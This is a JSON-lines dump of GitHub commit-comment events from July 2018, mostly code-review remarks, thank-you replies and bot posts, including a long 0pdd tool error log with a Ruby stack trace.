{"id":"7914047680","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29584620,"position":19,"line":19,"path":"src/index.js","commit_id":"2ebc5966c26cd753f9ee9bb560d58207f5929c35","created_at":"2018-07-03T17:38:16Z","updated_at":"2018-07-03T17:38:16Z","author_association":"COLLABORATOR","body":"Interesting use of the spread operator `...this.state.list`.\r\n\r\n3 things here:\r\n1. You can add an element to the end of the list by calling `list.push(item)`.\r\n2. I would only save the value (so it's a list of strings) and leave the rendering logic (wrapping every item in `<li>` tag) to the render function.\r\n3. `typeof key` should be string. For now, you can use `Date.now().toString()`.\r\n\r\n> The best way to pick a key is to use a string that uniquely identifies a list item among its siblings"}},"created_at":"2018-07-03T17:38:16Z"}
{"id":"7914050594","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584624,"position":8,"line":236,"path":"src/org/opendatakit/briefcase/reused/UncheckedFiles.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T17:38:48Z","updated_at":"2018-07-03T17:38:48Z","author_association":"OWNER","body":"Consider that File.isHidden might be faster since it doesn’t do the thing that can trigger an exception. Just guessing here."}},"created_at":"2018-07-03T17:38:48Z"}
{"id":"7914051802","type":"CommitCommentEvent","actor":{"login":"keatondunsford"},"repo":{"name":"urbit/arvo"},"payload":{"comment":{"id":29584627,"position":null,"line":null,"path":null,"commit_id":"a2a5d486bfa39378e5317800acc817eb8ec96273","created_at":"2018-07-03T17:39:02Z","updated_at":"2018-07-03T17:39:02Z","author_association":"CONTRIBUTOR","body":"Seems like this should have been bumped from [zero to one](https://i.imgflip.com/2dce7o.jpg), no? "}},"created_at":"2018-07-03T17:39:02Z"}
{"id":"7914052583","type":"CommitCommentEvent","actor":{"login":"vuvulk"},"repo":{"name":"XiaoMi/mace"},"payload":{"comment":{"id":29584629,"position":1,"line":1,"path":"docker/README.md","commit_id":"cfa61d61c9b8c436d64d9a7ae625e37601a6992d","created_at":"2018-07-03T17:39:12Z","updated_at":"2018-07-03T17:39:12Z","author_association":"NONE","body":"[react-from-zero-master.zip](https://github.com/XiaoMi/mace/files/2160439/react-from-zero-master.zip)\r\ngit@github.com:kay-is/react-from-zero.git"}},"created_at":"2018-07-03T17:39:12Z"}
{"id":"7914053730","type":"CommitCommentEvent","actor":{"login":"alfredh"},"repo":{"name":"alfredh/baresip"},"payload":{"comment":{"id":29584635,"position":null,"line":null,"path":null,"commit_id":"fe823bd138ca335c6668a604f858e7bf80ad1a79","created_at":"2018-07-03T17:39:26Z","updated_at":"2018-07-03T17:39:26Z","author_association":"OWNER","body":"thanks @Encamy fixed in e5f830fc8044510758167097c89edc050415ff0e"}},"created_at":"2018-07-03T17:39:26Z"}
{"id":"7914053833","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584636,"position":4,"line":4,"path":"desk.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:39:28Z","updated_at":"2018-07-03T17:39:28Z","author_association":"NONE","body":"может лучше `cards` ?\r\nа то как-то `Deck.new.deck`..."}},"created_at":"2018-07-03T17:39:28Z"}
{"id":"7914059646","type":"CommitCommentEvent","actor":{"login":"afreeland"},"repo":{"name":"afreeland/python-rake"},"payload":{"comment":{"id":29584650,"position":null,"line":null,"path":null,"commit_id":"645abdc9275db97270532b77896a3e926f967203","created_at":"2018-07-03T17:40:40Z","updated_at":"2018-07-03T17:40:40Z","author_association":"OWNER","body":"I used the backtick character, out of markdown habit, and apparently a few words were dropped from commit #facepalm\r\n\r\nUpdated `load_stop_words` to explicitly use `io` for compatiblity support\r\n\r\n"}},"created_at":"2018-07-03T17:40:40Z"}
{"id":"7914063690","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29584668,"position":null,"line":null,"path":null,"commit_id":"3f42c1a3ab1a5af12f448dd4049cbf77d2c98b18","created_at":"2018-07-03T17:41:29Z","updated_at":"2018-07-03T17:41:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [008 - Criar tratamento para exceções](https://trello.com/c/AK6oXwiu/18-008-criar-tratamento-para-exce%C3%A7%C3%B5es)"}},"created_at":"2018-07-03T17:41:29Z"}
{"id":"7914064508","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29584673,"position":19,"line":19,"path":"src/index.js","commit_id":"2ebc5966c26cd753f9ee9bb560d58207f5929c35","created_at":"2018-07-03T17:41:39Z","updated_at":"2018-07-03T17:41:39Z","author_association":"OWNER","body":"Thank you for the review!\nThis helps a lot.\nI'll make some changes and commit again :D\n\nOn Tue, Jul 3, 2018 at 6:38 PM, Hideya Swider <notifications@github.com>\nwrote:\n\n> Interesting use of the spread operator ...this.state.list.\n>\n> 3 things here:\n>\n>    1. You can add an element to the end of the list by calling\n>    list.push(item).\n>    2. I would only save the value (so it's a list of strings) and leave\n>    the rendering logic (wrapping every item in <li> tag) to the render\n>    function.\n>    3. typeof key should be string. For now, you can use\n>    Date.now().toString().\n>\n> The best way to pick a key is to use a string that uniquely identifies a\n> list item among its siblings\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ImenBenA/Tasks/commit/2ebc5966c26cd753f9ee9bb560d58207f5929c35#commitcomment-29584620>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AihdtpFrzd1gE8g5OHfmhPoBYPggVREGks5uC6wIgaJpZM4VBXSr>\n> .\n>\n"}},"created_at":"2018-07-03T17:41:39Z"}
{"id":"7914066511","type":"CommitCommentEvent","actor":{"login":"hippogamesunity"},"repo":{"name":"hippogamesunity/SimpleGif"},"payload":{"comment":{"id":29584679,"position":null,"line":null,"path":null,"commit_id":"c90b737cf1b70846ecc6fa06da53f41fc0872980","created_at":"2018-07-03T17:42:04Z","updated_at":"2018-07-03T17:42:04Z","author_association":"OWNER","body":"@TheReyzer I've got one question. How did you navigate to this commit? =) Why not just to email me?"}},"created_at":"2018-07-03T17:42:04Z"}
{"id":"7914069719","type":"CommitCommentEvent","actor":{"login":"ErkamKahriman"},"repo":{"name":"TuranicTeam/Altay"},"payload":{"comment":{"id":29584686,"position":null,"line":null,"path":null,"commit_id":"a2dcaee5da8b54e2dec6d21025008beabe138246","created_at":"2018-07-03T17:42:43Z","updated_at":"2018-07-03T17:42:43Z","author_association":"CONTRIBUTOR","body":"xD"}},"created_at":"2018-07-03T17:42:43Z"}
{"id":"7914071746","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29584692,"position":null,"line":null,"path":null,"commit_id":"0356ee6d146f05cf22bc475a1d3e1347d433df36","created_at":"2018-07-03T17:43:09Z","updated_at":"2018-07-03T17:43:09Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site && pdd -v -f /tmp/20180703-27789-rgh0ns [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site && pdd -v -f /tmp/20180703-27789-rgh0ns [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site\n+ pdd -v -f /tmp/20180703-27789-rgh0ns\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site\n212 file(s) found, 56 excluded\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/pages/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/pages/management/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/pages/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/pages/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/search/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/images/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/images/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/ecommerce/img/02.png is a binary file (32719 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/ecommerce/img/01.png is a binary file (247355 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/ecommerce/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/ecommerce/__init__.py is a binary file (1 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/pages/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/search/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/images/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/images/assets/gold.jpg is a binary file (45940 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/images/assets/deer.jpg is a binary file (19044 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/ecommerce/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/fixtures/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/generic_admin/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/tests/refarm_redirects/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/catalog/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/catalog/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/catalog/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/catalog/views/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_cc0000_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/jstree/32px.png is a binary file (1562 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/jstree/throbber.gif is a binary file (1720 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/jstree/40px.png is a binary file (5717 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_444444_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_555555_256x240.png is a binary file (3274 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_777620_256x240.png is a binary file (3262 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-bg_flat_0_aaaaaa_40x100.png is a binary file (86 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_ffffff_256x240.png is a binary file (3264 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/ui-icons_777777_256x240.png is a binary file (3266 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/front/images/loading.gif is a binary file (1787 bytes)\n/tmp/0pdd20180703-4-1pbrzyv/fidals/refarm-site/generic_admin/__init__.py is a binary file (0 bytes)\nReading .gitignore...\nReading pages/urls.py...\nPuzzle 343-7b06e173 30/DEV at pages/urls.py\nReading pages/views.py...\nReading pages/templatetags/pages_extras.py...\nReading pages/management/commands/get_app_path_for_gulp.py...\nReading pages/management/commands/custom_pages.py...\nReading pages/apps.py...\nReading pages/templates/pages/breadcrumbs.html...\nReading pages/templates/pages/page.html...\nReading pages/templates/pages/sitemap.html...\nReading pages/templates/pages/accordion.html...\nReading pages/templates/pages/breadcrumbs_with_siblings.html...\nReading pages/templates/robots.txt...\nReading pages/templates/index/index.html...\nReading pages/migrations/0013_auto_20170317_1457.py...\nReading pages/migrations/0005_db_refactor.py...\nReading pages/migrations/0006_remove_redundant_fields.py...\nReading pages/migrations/0015_add_validation_to_template.py...\nReading pages/migrations/0012_auto_20170301_0020.py...\nReading pages/migrations/0003_auto_20160909_0747.py...\nReading pages/migrations/0008_add_db_index.py...\nReading pages/migrations/0007_rename_private_field.py...\nReading pages/migrations/0001_initial.py...\nReading pages/migrations/0009_pages_mptt.py...\nReading pages/migrations/0002_auto_20160829_1730.py...\nReading pages/migrations/0014_auto_20170504_0944.py...\nReading pages/migrations/0010_rebuild_pages_tree.py...\nReading pages/migrations/0011_title_to_text_field.py...\nReading pages/migrations/0004_auto_20160909_1100.py...\nReading pages/__init__.py...\nReading pages/utils.py...\nReading pages/README.md...\nReading pages/models.py...\nReading search/urls.py...\nReading search/views.py...\nPuzzle 85-5b8190cf 0/DEV at search/views.py\nReading search/apps.py...\nReading search/templates/search/results.html...\nReading search/templates/search/no_results.html...\nReading search/migrations/0001_trigram_search.py...\nReading search/search.py...\nReading LICENSE...\nReading images/templatetags/images.py...\nReading images/apps.py...\nReading images/migrations/0004_auto_20170124_1444.py...\nReading images/migrations/0006_auto_20170418_1615.py...\nReading images/migrations/0003_auto_20161027_0940.py...\nReading images/migrations/0005_auto_20170317_1457.py...\nReading images/migrations/0002_alter_fields.py...\nReading images/migrations/0001_initial.py...\nReading images/__init__.py...\nReading images/models.py...\nReading docker/docker-compose.yml...\nReading docker/.env.dist...\nReading docker/Dockerfile.python...\nReading ecommerce/urls.py...\nReading ecommerce/front/paths.js...\nReading ecommerce/front/backcall.es6...\nReading ecommerce/front/trackers.es6...\nPuzzle 292-ba927d60 0/DEV at ecommerce/front/trackers.es6\nReading ecommerce/views.py...\nReading ecommerce/mailer.py...\nReading ecommerce/apps.py...\nReading ecommerce/templates/ecommerce/order/backcall_modal.html...\nReading ecommerce/templates/ecommerce/order/order.html...\nReading ecommerce/templates/ecommerce/order/table_form.html...\nReading ecommerce/templates/ecommerce/order/backcall_email.html...\nReading ecommerce/templates/ecommerce/order/success.html...\nReading ecommerce/templates/ecommerce/order/email.html...\nReading ecommerce/templates/ecommerce/header_cart.html...\nReading ecommerce/migrations/0003_position_vendor_code.py...\nReading ecommerce/migrations/0002_auto_20161123_0936.py...\nReading ecommerce/migrations/0001_initial.py...\nReading ecommerce/context_processors.py...\nReading ecommerce/tasks.py...\nReading ecommerce/README.md...\nReading ecommerce/models.py...\nReading ecommerce/cart.py...\nReading ecommerce/admin.py...\nReading ecommerce/forms.py...\nReading tests/urls.py...\nReading tests/pages/test_models.py...\nReading tests/pages/urls.py...\nReading tests/pages/test_views.py...\nReading tests/search/test_models.py...\nReading tests/search/urls.py...\nReading tests/search/views.py...\nReading tests/search/test_views.py...\nPuzzle 85-01b685cc 0/DEV at tests/search/test_views.py\nReading tests/images/tests.py...\nReading tests/ecommerce/tests_models.py...\nReading tests/ecommerce/tests_forms.py...\nReading tests/ecommerce/urls.py...\nReading tests/ecommerce/views.py...\nReading tests/ecommerce/tests_views.py...\nReading tests/ecommerce/tests_cart.py...\nReading tests/ecommerce/tests_mailer.py...\nReading tests/ecommerce/models.py...\nReading tests/static/logo.svg...\nReading tests/management/commands/create_fixtures.py...\nReading tests/fixtures/search.json...\nReading tests/migrations/0001_initial.py...\nReading tests/test_settings.py...\nPuzzle 140-e3f06142 60/DEV at tests/test_settings.py\nReading tests/catalog/test_models.py...\nReading tests/catalog/urls.py...\nReading tests/catalog/views.py...\nReading tests/catalog/models.py...\nReading tests/catalog/test_views.py...\nReading tests/generic_admin/urls.py...\nReading tests/generic_admin/test_admin_models.py...\nReading tests/generic_admin/test_views.py...\nReading tests/models.py...\nReading tests/refarm_redirects/test_views.py...\nERROR: tests/refarm_redirects/test_views.py; puzzle at line #1; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-03T17:43:09Z"}
{"id":"7914074168","type":"CommitCommentEvent","actor":{"login":"stevstrong"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29584698,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T17:43:38Z","updated_at":"2018-07-03T17:43:38Z","author_association":"CONTRIBUTOR","body":"After applying the fix above, the 1ms delay is indeed 1ms, checked with the scope.\r\nFunnily, the 500µs delay is also correct now."}},"created_at":"2018-07-03T17:43:38Z"}
{"id":"7914074281","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29584701,"position":null,"line":null,"path":null,"commit_id":"f355a9c4f1ca78cd668d8e400d728bc871b69819","created_at":"2018-07-03T17:43:40Z","updated_at":"2018-07-03T17:43:40Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-2](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T17:43:40Z"}
{"id":"7914074701","type":"CommitCommentEvent","actor":{"login":"mkulesh"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29584704,"position":63,"line":76,"path":"src/HardwareLayout.h","commit_id":"9b4985a23111ac7d6183c8d0d041f4fbd0b43389","created_at":"2018-07-03T17:43:45Z","updated_at":"2018-07-03T17:43:45Z","author_association":"COLLABORATOR","body":"Мне кажется, в этих конфигурационных классах не нужно мудрить с приватными атрибутами и сеттерами/геттерами. По сути, это структуры данных, нужные для простой передачи кучи параметров, у них нет особой логики. Поэтому и атрибуты не обязательно защищать. Но это только мой мнение, я на нем не настаиваю."}},"created_at":"2018-07-03T17:43:45Z"}
{"id":"7914079483","type":"CommitCommentEvent","actor":{"login":"DanielRuf"},"repo":{"name":"amilajack/esm-dep-check"},"payload":{"comment":{"id":29584711,"position":null,"line":null,"path":null,"commit_id":"89e9a8232d90c674e966733b20dc4eb97e6a9dbd","created_at":"2018-07-03T17:44:41Z","updated_at":"2018-07-03T17:44:41Z","author_association":"NONE","body":"Thanks :+1: "}},"created_at":"2018-07-03T17:44:41Z"}
{"id":"7914081676","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29584713,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T17:45:09Z","updated_at":"2018-07-03T17:45:09Z","author_association":"NONE","body":"From the wiki\r\n\r\nMaximum 2 patches per union\r\nEach patch shall be trivial, like a parameter tweak. Patches that add/remove a concept/idea/feature shall pass individually.\"\r\n\r\nSo this breaks 2 guildelines.\r\n\r\nI don't see how this VLTC can help the decision to commit this \"thing\".\r\nAs @locutus2 pointed out, if a single idea did not pass on its own, it can be easily removed with a SPRT[-3,1] at STC and LTC.\r\n\r\nAnd we are not going to test some SPRT[-3, 1] at VLTC."}},"created_at":"2018-07-03T17:45:09Z"}
{"id":"7914083132","type":"CommitCommentEvent","actor":{"login":"valerycadovic"},"repo":{"name":"valerycadovic/NET.S.2018.Chadovich.03"},"payload":{"comment":{"id":29584716,"position":17,"line":17,"path":"NET.S.2018.Chadovich.03/Day3/Algorithms.cs","commit_id":"20b2cf3650461d98ca3f29fb1719e3c959e1f58f","created_at":"2018-07-03T17:45:25Z","updated_at":"2018-07-03T17:45:25Z","author_association":"OWNER","body":"Добавил описания исключений в XML-комментариях, исправил сигнатуры методов в классе GCD, заменил метод для вычисления времени с использованием делегата на перегрузку с параметром out long delay."}},"created_at":"2018-07-03T17:45:25Z"}
{"id":"7914083841","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29584717,"position":null,"line":null,"path":null,"commit_id":"882b8a2690a5f5c3f5c0a9e06daf0a6acf455f54","created_at":"2018-07-03T17:45:33Z","updated_at":"2018-07-03T17:45:33Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bug: Errata form fails if book parameter is incorrect](https://trello.com/c/WaJnNMMt/767-bug-errata-form-fails-if-book-parameter-is-incorrect)"}},"created_at":"2018-07-03T17:45:33Z"}
{"id":"7914084579","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584718,"position":30,"line":30,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:45:42Z","updated_at":"2018-07-03T17:45:42Z","author_association":"NONE","body":"проверку лучше вынести в отдельный метод и здесь написать что-то типа:\r\n```ruby\r\nopen_cards if full_hands\r\n```\r\nну или еще что-то более остроумное )"}},"created_at":"2018-07-03T17:45:42Z"}
{"id":"7914088366","type":"CommitCommentEvent","actor":{"login":"datalorax"},"repo":{"name":"muschellij2/slidex"},"payload":{"comment":{"id":29584727,"position":null,"line":null,"path":null,"commit_id":"c4b04f5ff6e9e6c3a4a59209aa5cc37cb081c6ac","created_at":"2018-07-03T17:46:27Z","updated_at":"2018-07-03T17:46:27Z","author_association":"NONE","body":"Thanks, this looks great! If you want to submit a PR I'll merge it in. Thanks so much!"}},"created_at":"2018-07-03T17:46:27Z"}
